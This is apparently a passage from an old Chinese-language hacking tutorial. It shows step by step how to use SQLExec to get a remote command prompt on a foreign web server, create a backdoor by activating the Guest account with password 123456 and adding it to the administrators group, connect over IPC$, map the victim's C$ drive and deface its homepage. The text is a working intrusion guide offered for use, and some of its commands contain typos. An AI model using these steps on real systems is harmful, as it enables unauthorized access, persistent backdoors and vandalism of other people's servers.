你就用到工具下载里面的SQLExec.zip了。

解压后。

c:\SQLExec xxx.xxx.xxx.xxx.xxx(美国网站）

-----------------------出现远程命令行的界面 ---------------------------------------------------

SQLCmd>_ 因此！我添加了一个后门帐号！（因为其站上只有一个Adminstrator帐号！ 我将Guest用户激活 SQLCmd>net user guest /actives net user guest /active:yes

The command completed successfully. 命令成功执行！！！

SQLCmd>net user guest 123456/*添加后门帐号密码！*/

net user guest 123456 The command completed sucessfully.

SQLCmd>net localgroup administrator guest /add /*将GUEST加入管理员组---当然你也可以该admin密码*/ net lovalgroup administrator guest /add The command completed successfully.

这样你就可以远程登入上去了。当然你的系统是NT ！！

C:\ net use \\xxx.xxx.xxx.xxx\ipc$ "123456" /user:"guest"

The command completed sucessfully

登上去了

c:\net use y: \\xxx.xxx.xxx.xxx\c$

The command completed sucessfully

把对方的C盘影射为我们的Y盘。我们访问它的C盘就象访问我们的硬盘一样。找到他的主页目录改了他吧！

**************如果你的系统是98系列

你就要在你系统启动进去98时出现的用户和密码登陆口填上帐号：guest 密码：123456

然后在你的MS-DOS下

c:\net use \\xxx.xxx.xxx.xxx\ipc$ (你不用在这里填写密码帐号了）

The command completed sucessfully （命令成功执行）

下面的方法和前面一样了！！！！

**********************NT弱口令的使用和以上用过ipc登陆上对方主机过程一样*********************